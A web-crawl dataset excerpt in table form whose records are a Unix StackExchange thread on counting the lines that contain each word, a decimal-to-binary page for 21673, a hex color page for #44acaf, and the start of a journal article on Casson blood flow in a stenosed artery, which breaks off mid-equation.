URL
stringlengths
15
1.68k
text_list
sequencelengths
1
199
image_list
sequencelengths
1
199
metadata
stringlengths
1.19k
3.08k
https://unix.stackexchange.com/questions/492501/count-lines-containing-word
[ "# Count lines containing word\n\nI have a file with multiple lines. I want to know, for each word that appears in the total file, how many lines contain that word, for example:\n\n``````0 hello world the man is world\n1 this is the world\n2 a different man is the possible one\n``````\n\nThe result I'm expecting is:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nNote that the count for \"world\" is 2, not 3, since the word appears on 2 lines. Because of this, translating blanks to newline chars wouldn't be the exact solution.\n\nAnother Perl variant, using List::Util\n\n``````\\$ perl -MList::Util=uniq -alne '\nmap { \\$h{\\$_}++ } uniq @F }{ for \\$k (sort keys %h) {print \"\\$k: \\$h{\\$k}\"}\n' file\n0: 1\n1: 1\n2: 1\na: 1\ndifferent: 1\nhello: 1\nis: 3\nman: 2\none: 1\npossible: 1\nthe: 3\nthis: 1\nworld: 2\n``````\n\nStraightfoward-ish in bash:\n\n``````declare -A wordcount\n# unique words on this line\ndeclare -A uniq\nfor word in \"\\${words[@]}\"; do\nuniq[\\$word]=1\ndone\n# accumulate the words\nfor word in \"\\${!uniq[@]}\"; do\n((wordcount[\\$word]++))\ndone\nunset uniq\ndone < file\n``````\n\nLooking at the data:\n\n``````\\$ declare -p wordcount\ndeclare -A wordcount='([possible]=\"1\" [one]=\"1\" [different]=\"1\" [this]=\"1\" [a]=\"1\" [hello]=\"1\" [world]=\"2\" [man]=\"2\" =\"1\" =\"1\" =\"1\" [is]=\"3\" [the]=\"3\" )'\n``````\n\nand formatting as you want:\n\n``````\\$ printf \"%s\\n\" \"\\${!wordcount[@]}\" | sort | while read key; do echo \"\\$key:\\${wordcount[\\$key]}\"; done\n0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nIt's a pretty straight-forward perl script:\n\n``````#!/usr/bin/perl -w\nuse strict;\n\nmy %words = ();\nwhile (<>) {\nchomp;\nmy %linewords = ();\nmap { \\$linewords{\\$_}=1 } split / /;\nforeach my \\$word (keys %linewords) {\n\\$words{\\$word}++;\n}\n}\n\nforeach my \\$word (sort keys %words) {\nprint \"\\$word:\\$words{\\$word}\\n\";\n}\n``````\n\nThe basic idea is to loop over the input; for each line, split it into words, then save those words into a hash (associative array) in order to remove any duplicates, then loop over that array of words and add one to an overall counter for that word. At the end, report on the words and their counts.\n\n• A slight problem with this is in my opinion that it does not respect what the usual definition of a word is, since it splits on a single space character. If two spaces were found somewhere, an empty string inbetween would be considered a word as well if I'm not mistaken. Let alone if words were separated by other punctuation characters. Of course, it was not specified in the question whether \"word\" is understood as the programmer's concept of a \"word\", or as a word of a natural language. – Larry Jan 4 '19 at 16:38\n\nA solution that calls several programs from a shell:\n\n`fmt -1 words.txt | sort -u | xargs -Ipattern sh -c 'echo \"pattern:\\$(grep -cw pattern words.txt)\"'`\n\nA little explanation:\n\nThe `fmt -1 words.txt` prints out all the words, 1 per line, and the `| sort -u` sorts this output and extracts only the unique words from it.\n\nIn order to count the occurences of a word in a file, one can use `grep` (a tool meant to search files for patterns). By passing the `-cw` option, grep gives the number of word matches it finds. So you can find the total number of occurrences of `pattern` using `grep -cw pattern words.txt`.\n\nThe tool `xargs` allows us to do this for each and every single word output by `sort`. The `-Ipattern` means that it will execute the following command multiple times, replacing each occurrence of pattern with a word it reads from standard input, which is what it gets from `sort`.\n\nThe indirection with `sh` is needed because `xargs` only knows how to execute a single program, given it's name, passing everything else as arguments to it. `xargs` does not handle things like command substitution. The `\\$(...)` is command substitution in the above snippet, as it substitutes the output from `grep` into `echo`, allowing it to be formatted correctly. Since we need the command substitution, we must use the `sh -c` command which runs whatever it recieves as an argument in its own shell.\n\n• An optimisation to this approach: `fmt -1 words.txt | sort | uniq -c | awk '{ print \\$2 \":\" \\$1 }'` – matja Jan 5 '19 at 0:14\n• @matja is `sort | uniq -c` more efficient than `sort -u`? – vikarjramun Jan 5 '19 at 3:31\n• vikarjramun@ no, but uniq -c gives you the counts of each word in one pass, so you don't have to use xargs to do multiple passes of the input file for each word. – matja Jan 5 '19 at 10:11\n• @matja: I actually made the answer you provided before the current one. However, it does not do what OP asked for. I misread the question at first entirely as well, and was corrected by glenn jackman. What you are suggesting would count every occurrence of each word. What OP asked for is to count the number of lines each word occurs in at least once. – Larry Jan 5 '19 at 10:17\n\nAnother simple alternative would be to use Python (>3.6). This solution has the same problem as the one mentioned by @Larry in his comment.\n\n``````from collections import Counter\n\nwith open(\"words.txt\") as f:\nc = Counter(word for line in [line.strip().split() for line in f] for word in set(line))\nfor word, occurrence in sorted(c.items()):\nprint(f'{word}:{occurrence}')\n# for Python 2.7.x compatibility you can replace the above line with\n# the following one:\n# print('{}:{}'.format(word, occurrence))\n``````\n\nA more explicit version version of the above:\n\n``````from collections import Counter\n\nFILENAME = \"words.txt\"\n\ndef find_unique_words():\nwith open(FILENAME) as f:\nlines = [line.strip().split() for line in f]\n\nunique_words = Counter(word for line in lines for word in set(line))\nreturn sorted(unique_words.items())\n\ndef print_unique_words():\nunique_words = find_unique_words()\nfor word, occurrence in unique_words:\nprint(f'{word}:{occurrence}')\n\ndef main():\nprint_unique_words()\n\nif __name__ == '__main__':\nmain()\n``````\n\nOutput:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nThe above also assumes that words.txt is on the same directory as script.py. Note that this is not much different from other solutions provided here, but perhaps somebody will find it useful.\n\nTrying to do it with awk:\n\ncount.awk:\n\n``````#!/usr/bin/awk -f\n# count line containing word\n\n{\nfor (i = 1 ; i <= NF ; i++) {\nword_in_a_line[\\$i] ++\nif (word_in_a_line[\\$i] == 1) {\nword_line_count[\\$i] ++\n}\n}\n\ndelete word_in_a_line\n}\n\nEND {\nfor (word in word_line_count){\nprintf \"%s:%d\\n\",word,word_line_count[word]\n}\n}\n``````\n\nRun it by:\n\n``````\\$ awk -f count.awk ./test.data | sort\n``````\n\n``````echo \"0 hello world the man is world\n1 this is the world\n2 a different man is the possible one\" | while IFS=\\$'\\n' read -r line; do echo \\$line | tr ' ' '\\n' | sort -u; done | sort | uniq -c\n\n1 0\n1 1\n1 2\n1 a\n1 different\n1 hello\n3 is\n2 man\n1 one\n1 possible\n3 the\n1 this\n2 world\n``````\n\nI looped unique words on each line and passed it to `uniq -c`\n\nedit: I did not see glenn's answer. I found it strange to not see a bash answer\n\nSimple, though doesn't care if it reads the file many times:\n\n``````sed 's/ /\\n/g' file.txt | sort | uniq | while read -r word; do\nprintf \"%s:%d\\n\" \"\\$word\" \"\\$(grep -Fw \"\\$word\" file.txt | wc -l)\"\ndone\n``````\n\nEDIT: Despite converting spaces to newlines, this does count lines that have an occurrence of each word and not the occurrences of the words themselves. It gives the result:\n\n``````0:1\n1:1\n2:1\na:1\ndifferent:1\nhello:1\nis:3\nman:2\none:1\npossible:1\nthe:3\nthis:1\nworld:2\n``````\n\nwhich is character-by-character identical to OP's example result.\n\n• Read the question again. It literally says `translating blanks to newline chars wouldn't be the exact solution`. – Sparhawk Jan 5 '19 at 9:59\n• @Sparhawk Read the answer again. This does give the answer he gave as example, including giving the result of 2 instead of 3 for world. He meant that doing something like `sed 's/ /\\n/g' | sort | uniq -c` would not work because it'd give the answer 3 for world, but that's not what this answer does. It correctly counts the lines where the words occur and not the occurrences themselves, just like OP wanted. – JoL Jan 6 '19 at 7:03\n• Ah right, apologies! I would recommend putting in an explanation of your code, which is both helpful to the questioner, and clarifies what it does. Also, as a minor point, you probably want `read -r` here. – Sparhawk Jan 6 '19 at 9:38" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87940234,"math_prob":0.6044964,"size":1363,"snap":"2021-21-2021-25","text_gpt3_token_len":317,"char_repetition_ratio":0.11994113,"word_repetition_ratio":0.0,"special_character_ratio":0.22450477,"punctuation_ratio":0.11272727,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9604343,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-08T04:20:36Z\",\"WARC-Record-ID\":\"<urn:uuid:6995bce9-9f04-46d7-98dc-17d73e69ec27>\",\"Content-Length\":\"238721\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:61b5a417-ae64-46b6-8cbf-d3bb6d6225b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:471e8693-1a08-4319-8e5f-01985fb763a7>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://unix.stackexchange.com/questions/492501/count-lines-containing-word\",\"WARC-Payload-Digest\":\"sha1:LRRUITAHAHOBKYWDHZ7WWF7HNTVHVWGY\",\"WARC-Block-Digest\":\"sha1:CQMOOZQQZBGGMZJCO2QXPVZ4WQXS75SM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243988837.67_warc_CC-MAIN-20210508031423-20210508061423-00224.warc.gz\"}"}
https://www.decimaltobinary.com/21673-in-binary
[ "# 21673 in Binary\n\nWhat is 21673 in binary? Below we show you the result of the decimal to binary conversion straightaway. If you want to know how to convert 21673 to binary please read the instructions on the homepage.\n\nBinary 21673 = 1010100101010012\nThe binary for 21673 is 101010010101001\n\nAs any other integer, 21673 can be written as sum of potencies to the power of 2, known as binary code. Here’s the proof that 101010010101001 is the binary of 21673:\n\n1×2^14 + 0x2^13 + 1×2^12 + 0x2^11 + 1×2^10 + 0x2^9 + 0x2^8 + 1×2^7 + 0x2^6 + 1×2^5 + 0x2^4 + 1×2^3 + 0x2^2 + 0x2^1 + 1×2^0 = 21673\n\nYet, make sure to learn about 21673 in binary signed in the next section.\n\nIf you like to know the binary code for any other decimal number than 21673 please use our converter below. Enter any number and hit Decimal to Binary:\n\nSimilar decimal to binary conversions on this web site include:\n\n## Convert 21673 to Binary\n\nNow you already know the most important thing about 21673 in binary form. 101010010101001 is binary 21673. That is if the binary in unsigned.", null, "If 21673 in binary is signed such as with two’s complement, then the binary code has a number of trailing zeroes, e.g. 000101010010101001 in which the leftmost bit is the sign bit, followed perhaps by more trailing 0’s, and then by magnitude bits.\n\nThe reason to have the binary 21673 signed is to accommodate for negative numbers, in which case the sign bit is 1 in our example. Therefore, minus 21673 signed using two’s complement, will start with one or more 1’s, but the exact code for -21673 decimal to binary depends on the signed number representation system and number of bits available.\n\nHere you can convert binary to decimal. If you like to know what decimal 21673 is on other number systems, we have that too:" ]
[ null, "data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%200%200'%3E%3C/svg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9013973,"math_prob":0.9806205,"size":2212,"snap":"2020-34-2020-40","text_gpt3_token_len":607,"char_repetition_ratio":0.18115942,"word_repetition_ratio":0.010126582,"special_character_ratio":0.33047017,"punctuation_ratio":0.088495575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9977219,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-25T15:21:37Z\",\"WARC-Record-ID\":\"<urn:uuid:59e2a865-3141-48b3-8422-f6c459e962ca>\",\"Content-Length\":\"35247\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8ddddc58-c8c7-477b-a5a3-59264ed6889b>\",\"WARC-Concurrent-To\":\"<urn:uuid:178d1ae7-5ae4-45dc-893e-b4e2602d320a>\",\"WARC-IP-Address\":\"104.24.108.35\",\"WARC-Target-URI\":\"https://www.decimaltobinary.com/21673-in-binary\",\"WARC-Payload-Digest\":\"sha1:7SW4XR7GQ37QTYOGRJPBYL6DNHT6TTEE\",\"WARC-Block-Digest\":\"sha1:RKVUM526E3YW2OLXO2XL4O26RS2WTI2F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400227524.63_warc_CC-MAIN-20200925150904-20200925180904-00249.warc.gz\"}"}
https://www.colorhexa.com/44acaf
[ "# #44acaf Color Information\n\nIn a RGB color space, hex #44acaf is composed of 26.7% red, 67.5% green and 68.6% blue. Whereas in a CMYK color space, it is composed of 61.1% cyan, 1.7% magenta, 0% yellow and 31.4% black. It has a hue angle of 181.7 degrees, a saturation of 44% and a lightness of 47.6%. #44acaf color hex could be obtained by blending #88ffff with #00595f. Closest websafe color is: #339999.\n\n• R 27\n• G 67\n• B 69\nRGB color chart\n• C 61\n• M 2\n• Y 0\n• K 31\nCMYK color chart\n\n#44acaf color description : Dark moderate cyan.\n\n# #44acaf Color Conversion\n\nThe hexadecimal color #44acaf has RGB values of R:68, G:172, B:175 and CMYK values of C:0.61, M:0.02, Y:0, K:0.31. Its decimal value is 4500655.\n\nHex triplet RGB Decimal 44acaf `#44acaf` 68, 172, 175 `rgb(68,172,175)` 26.7, 67.5, 68.6 `rgb(26.7%,67.5%,68.6%)` 61, 2, 0, 31 181.7°, 44, 47.6 `hsl(181.7,44%,47.6%)` 181.7°, 61.1, 68.6 339999 `#339999`\nCIE-LAB 64.825, -28.573, -10.47 24.872, 33.827, 45.774 0.238, 0.324, 33.827 64.825, 30.431, 200.125 64.825, -41.514, -11.52 58.161, -25.448, -5.949 01000100, 10101100, 10101111\n\n# Color Schemes with #44acaf\n\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af4744\n``#af4744` `rgb(175,71,68)``\nComplementary Color\n• #44af7d\n``#44af7d` `rgb(68,175,125)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #4477af\n``#4477af` `rgb(68,119,175)``\nAnalogous Color\n• #af7d44\n``#af7d44` `rgb(175,125,68)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af4477\n``#af4477` `rgb(175,68,119)``\nSplit Complementary Color\n• #acaf44\n``#acaf44` `rgb(172,175,68)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af44ac\n``#af44ac` `rgb(175,68,172)``\n• #44af47\n``#44af47` `rgb(68,175,71)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #af44ac\n``#af44ac` `rgb(175,68,172)``\n• #af4744\n``#af4744` `rgb(175,71,68)``\n• #2f7678\n``#2f7678` `rgb(47,118,120)``\n• #36888a\n``#36888a` `rgb(54,136,138)``\n• #3d9a9d\n``#3d9a9d` `rgb(61,154,157)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #51b8bb\n``#51b8bb` `rgb(81,184,187)``\n• #63c0c3\n``#63c0c3` `rgb(99,192,195)``\n• #76c7ca\n``#76c7ca` `rgb(118,199,202)``\nMonochromatic Color\n\n# Alternatives to #44acaf\n\nBelow, you can see some colors close to #44acaf. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #44af97\n``#44af97` `rgb(68,175,151)``\n• #44afa0\n``#44afa0` `rgb(68,175,160)``\n• #44afa9\n``#44afa9` `rgb(68,175,169)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #44a3af\n``#44a3af` `rgb(68,163,175)``\n• #449aaf\n``#449aaf` `rgb(68,154,175)``\n• #4491af\n``#4491af` `rgb(68,145,175)``\nSimilar Colors\n\n# #44acaf Preview\n\nThis text has a font color of #44acaf.\n\n``<span style=\"color:#44acaf;\">Text here</span>``\n#44acaf background color\n\nThis paragraph has a background color of #44acaf.\n\n``<p style=\"background-color:#44acaf;\">Content here</p>``\n#44acaf border color\n\nThis element has a border color of #44acaf.\n\n``<div style=\"border:1px solid #44acaf;\">Content here</div>``\nCSS codes\n``.text {color:#44acaf;}``\n``.background {background-color:#44acaf;}``\n``.border {border:1px solid #44acaf;}``\n\n# Shades and Tints of #44acaf\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #020505 is the darkest color, while #f6fbfc is the lightest one.\n\n• #020505\n``#020505` `rgb(2,5,5)``\n• #081314\n``#081314` `rgb(8,19,20)``\n• #0d2122\n``#0d2122` `rgb(13,33,34)``\n• #132f30\n``#132f30` `rgb(19,47,48)``\n• #183d3e\n``#183d3e` `rgb(24,61,62)``\n• #1e4b4c\n``#1e4b4c` `rgb(30,75,76)``\n• #23595a\n``#23595a` `rgb(35,89,90)``\n• #296768\n``#296768` `rgb(41,103,104)``\n• #2e7476\n``#2e7476` `rgb(46,116,118)``\n• #348285\n``#348285` `rgb(52,130,133)``\n• #399093\n``#399093` `rgb(57,144,147)``\n• #3f9ea1\n``#3f9ea1` `rgb(63,158,161)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #4db7ba\n``#4db7ba` `rgb(77,183,186)``\n• #5bbcbf\n``#5bbcbf` `rgb(91,188,191)``\n• #69c2c5\n``#69c2c5` `rgb(105,194,197)``\n• #77c8ca\n``#77c8ca` `rgb(119,200,202)``\n• #85ced0\n``#85ced0` `rgb(133,206,208)``\n• #93d3d5\n``#93d3d5` `rgb(147,211,213)``\n• #a2d9db\n``#a2d9db` `rgb(162,217,219)``\n• #b0dfe0\n``#b0dfe0` `rgb(176,223,224)``\n• #bee5e6\n``#bee5e6` `rgb(190,229,230)``\n• #cceaeb\n``#cceaeb` `rgb(204,234,235)``\n• #daf0f1\n``#daf0f1` `rgb(218,240,241)``\n• #e8f6f6\n``#e8f6f6` `rgb(232,246,246)``\n• #f6fbfc\n``#f6fbfc` `rgb(246,251,252)``\nTint Color Variation\n\n# Tones of #44acaf\n\nA tone is produced by adding gray to any pure hue. In this case, #738080 is the less saturated color, while #03eaf0 is the most saturated one.\n\n• #738080\n``#738080` `rgb(115,128,128)``\n• #69898a\n``#69898a` `rgb(105,137,138)``\n• #609293\n``#609293` `rgb(96,146,147)``\n• #579a9c\n``#579a9c` `rgb(87,154,156)``\n• #4da3a6\n``#4da3a6` `rgb(77,163,166)``\n• #44acaf\n``#44acaf` `rgb(68,172,175)``\n• #3bb5b8\n``#3bb5b8` `rgb(59,181,184)``\n• #31bec2\n``#31bec2` `rgb(49,190,194)``\n• #28c6cb\n``#28c6cb` `rgb(40,198,203)``\n• #1fcfd4\n``#1fcfd4` `rgb(31,207,212)``\n• #15d8de\n``#15d8de` `rgb(21,216,222)``\n• #0ce1e7\n``#0ce1e7` `rgb(12,225,231)``\n• #03eaf0\n``#03eaf0` `rgb(3,234,240)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #44acaf is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57528436,"math_prob":0.5398516,"size":3715,"snap":"2020-10-2020-16","text_gpt3_token_len":1641,"char_repetition_ratio":0.119374834,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5399731,"punctuation_ratio":0.23608018,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9828734,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-28T11:07:36Z\",\"WARC-Record-ID\":\"<urn:uuid:c342a67f-7511-4800-befa-202118888f46>\",\"Content-Length\":\"36318\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:75c028af-953e-4236-b9fe-fc63e64e827f>\",\"WARC-Concurrent-To\":\"<urn:uuid:7772262b-964f-406f-ba12-40e9739c5cb1>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/44acaf\",\"WARC-Payload-Digest\":\"sha1:VLSFXQHXLMSJ4XASMK4DTE4YEZNKTCNW\",\"WARC-Block-Digest\":\"sha1:RFIGN76BX7JALRHBZHYRGOO6RTC7EFHH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370491857.4_warc_CC-MAIN-20200328104722-20200328134722-00193.warc.gz\"}"}
https://joems.springeropen.com/articles/10.1186/s42787-022-00157-8
[ "# Casson rheological flow model in an inclined stenosed artery with non-Darcian porous medium and quadratic thermal convection\n\n## Abstract\n\nThe current study investigates the combined response of the Darcy–Brinkman–Forchheimer and nonlinear thermal convection influence among other fluid parameters on Casson rheology (blood) flow through an inclined tapered stenosed artery with magnetic effect. Considering the remarkable importance of mathematical models to the physical behavior of fluid flow in human systems for scientific, biological, and industrial use, the present model predicts the motion and heat transfer of blood flow through tapered stenosed arteries under some underline conditions. The momentum and energy equations for the model were obtained and solved using the collocation method with the Legendre polynomial basis function. The expressions obtained for the velocity and temperature were graphed to show the effects of the Darcy–Brinkman–Forchheimer term, Casson parameters, and nonlinear thermal convection term among others. The results identified that a higher Darcy–Brinkman number slows down the blood temperature, while continuous injection of the Casson number decreases both velocity and temperature distribution.\n\n## Introduction\n\nStenosis refers to a strange narrowing in a blood vessel or other tubular organs such as the foramina and canal. It is also known as urethral stricture. Atherosclerosis is the majorly cause of stenosis, a form of the disease in which the wall of the artery develops lesions (abnormalities that can eventually lead to narrowing due to deposits of fats). Blood is a non-Newtonian fluid, that is, the viscosity varies with the shear rate which makes it a shear-thinning fluid. The study of mathematical biology and computational fluid mechanics has enhanced the work of researchers to inspect the mathematical and physical behavior of blood flow for use in medicine and other industrial applications. Among the novel, investigations in the area of tapered stenosed arteries include the work of Abubakar and Adeoye , and Abubakar et al. study of steady blood flow through stenosis under the influence of a magnetic field. The influence of MHD blood flow and heat transfer through an inclined porous stenosed artery with variable viscosity is presented by Tripathi and Kumar . Chaturani and Samy discussed the pulsatile flow of Casson fluid through arteries (stenosed) with blood application. Bio-inspired peristaltic propulsion of hybrid nanofluid flow with hybrid nanoparticle aggregation was discussed by Bhatti et al. .\n\nRecently, Sharma et al. investigated the flow of blood through a multi-stenosed tapered artery; the study was centered on the slip flow and thermal radiation influence with the inclusion of hybrid nanoparticles (Au-Al2O3/Blood) and second law analysis; thus, the impact of Au and slip velocity is fully remarked. Poonam et al. utilized the finite difference (C-N) scheme to examine the heat and mass transfer flow of pulsatile blood through a curved artery subject to hybrid nanoparticles (Au-Al2O3/blood) aggregation, and Ikbar et al. enumerated their model for the non-Newtonian flow of blood through a stenosed artery in the presence of a transverse magnetic field. Blood is taken into account as the third-grade non-Newtonian fluid in the work presented by Akbarzedeh ; the study revealed that the mean value of the velocity increases, and the amplitude of the velocity remains constant as the pressure gradient rises.\n\nMandal et al. developed and discussed a two-dimensional mathematical model for the study of body acceleration external effect on non-Newtonian blood flow in a stenosed artery, and the blood is characterized by the generalized power-law model. Hayat et al. considered Darcy–Brinkman–Forchheimer flow with Cattaneo–Christov homogeneous–heterogeneous, therein, MHD effects are considered on the flow of blood in the stenosed artery. Bio-inspired peristaltic propulsion of hybrid nanofluid flow nanoparticles subject to magnetic effects is carried out by Bhatti and Abdelsalam , and their focus demonstrated how Ta-NPs can be employed for the removal of unwanted reactive oxygen species in both small and large animals as well as in biomedical systems. Krishna [12, 13] studied the effect of heat and mass flux conditions on the magnetohydrodynamics flow of Casson fluid over a curved stretching surface. Mustafa investigate the pipe flow of Eyring-Powell fluid enumerating its impact on flow and heat transfer. Mustafa as well study the second law phenomena in thermal transport through the metallic porous channel; in the study, the impact of Brinkman–Darcy model is enumerated, to mention but a few among the numerous investigations. Hemodynamic characteristics of gold nanoparticle blood flow through a tapered stenosed vessel with variable nanofluid viscosity were discussed by Elnaqeeb et al . Beckermann et al. presented the numerical study of a porous enclosure medium with non-Darcian natural convection influence. The work enumerated that Forchheimer’s extension must be included for Prandtl number less than one. In related work, Bhargava et al. explore the finite element analysis for drug diffusion and transient pulsatile magneto-hemodynamic non-Newtonian flow in a porous channel.\n\nNumerical methods have been the simplest and most approachable way of obtaining an approximate solution to systems of highly nonlinear equations of which the collocation method is one of them. The current investigation utilized one of the orthogonal polynomials called the Legendre polynomial combined with the collocation method. Among the studies that have used this approach include Mallawi et al. solution to the nonlinear differential equation was solved by computational means of Legendre collocation points. Guner and Yalcinbas worked on the Legendre collocation method for solving a nonlinear differential equation, to mention but just a few. Motivated by all the above-mentioned research, this article presents the effects of the non-Darcian porous medium and quadratic thermal convection behavior on equations governing the blood flow through an inclined tapered stenosed artery. The model of the nonlinear equations has been solved numerically using the Legendre collocation method with the aid of Wolfram Mathematica 11.3 under the defined boundary conditions. MAPLE 18 generated the codes are used to show the effects of the Darcy–Brinkman–Forchheimer term, Casson parameters, nonlinear thermal convection term, and variation in inclination angle of the blood flow in the inclined stenosed artery graphically.\n\n## Problem formulation\n\nThe flow of blood is taken to be flowing in a cylindrical form of the narrow artery, in an axial direction, as shown in Fig. 1. Let ($$r$$, $$\\theta$$, and $$z$$) be the polar coordinate system (cylindrical), and let $$\\tilde{u}$$, $$\\tilde{v}$$ and $$\\tilde{w}$$ be the velocity components in the $$r$$, $$\\theta$$, and $$z$$ directions. We consider magnetohydrodynamics (MHD) Newtonian fluid of density $$\\rho$$ and variable viscosity $$\\mu$$ flowing through a porous material in a tube having a finite length $$L$$. The stenosed artery is inclined at the angle $$\\gamma$$ from the vertical axis with outside applied radiation $$q_{r}$$ and magnetic field $$M$$.\n\nThe governing equations for the model are as follows:\n\nContinuity equation\n\n$$\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} + \\;\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}} + \\frac{{\\tilde{u}}}{{\\tilde{r}}} = 0$$\n(1)\n\nMomentum equation (r-direction)\n\n$$\\rho \\left[ {\\tilde{u}\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}}} \\right] = \\; - \\frac{{\\partial \\tilde{P}}}{{\\partial \\tilde{r}}} + \\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {2\\mu \\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}}} \\right] + \\frac{2\\mu }{{\\tilde{r}}}\\left[ {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{r}}} - \\frac{{\\tilde{u}}}{{\\tilde{r}}}} \\right] + \\frac{\\partial }{{\\partial \\tilde{z}}}\\left[ {\\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)} \\right]$$\n(2)\n\nMomentum equation (z-direction)\n\n\\begin{aligned} \\rho \\left[ {\\tilde{u}\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right] & = - \\frac{{\\partial \\tilde{P}}}{{\\partial \\tilde{z}}} + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left\\{ {\\frac{\\partial }{{\\partial \\tilde{z}}}\\left[ {\\left( {2\\mu \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right)} \\right] + \\frac{1}{{\\tilde{r}}}\\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {\\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)} \\right]} \\right\\} - \\sigma_{1} \\mu_{m}^{2} H_{0}^{2} \\tilde{v} \\\\ & \\quad + \\rho g[\\alpha_{1} \\left( {T - T_{0} } \\right) + \\alpha_{2} \\left( {T - T_{0} } \\right)^{2} ]{\\text{cos}}\\gamma - \\;\\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{\\mu \\tilde{V}}}{{K_{1} }} - \\frac{{b^{*} v^{2} }}{{k_{1} }} \\\\ \\end{aligned}\n(3)\n\nEnergy equation\n\n$$\\rho c_{p} \\left[ {\\tilde{u}\\frac{\\partial T}{{\\partial \\tilde{r}}} + \\tilde{v}\\frac{\\partial T}{{\\partial \\tilde{r}}}} \\right] = \\frac{k}{{\\tilde{r}}}\\frac{\\partial }{{\\partial \\tilde{r}}}\\left[ {\\tilde{r}\\frac{\\partial T}{{\\partial \\tilde{r}}}} \\right] + k\\frac{{\\partial^{2} T}}{{\\partial \\tilde{z}^{2} }} + 2\\mu \\left( {1 + \\frac{1}{\\beta }} \\right)\\, + \\left\\{ {\\left[ {\\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}}} \\right)^{2} + \\left( {\\frac{{\\tilde{u}}}{{\\tilde{r}}}} \\right)^{2} + \\left( {\\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{z}}}} \\right)^{2} } \\right] + \\mu \\left( {\\frac{{\\partial \\tilde{u}}}{{\\partial \\tilde{z}}} + \\frac{{\\partial \\tilde{v}}}{{\\partial \\tilde{r}}}} \\right)^{2} } \\right\\} - \\frac{{\\partial q_{r} }}{{\\partial \\tilde{r}}}$$\n(4)\n\nwhere $$\\frac{{b^{*} v^{2} }}{{k_{1} 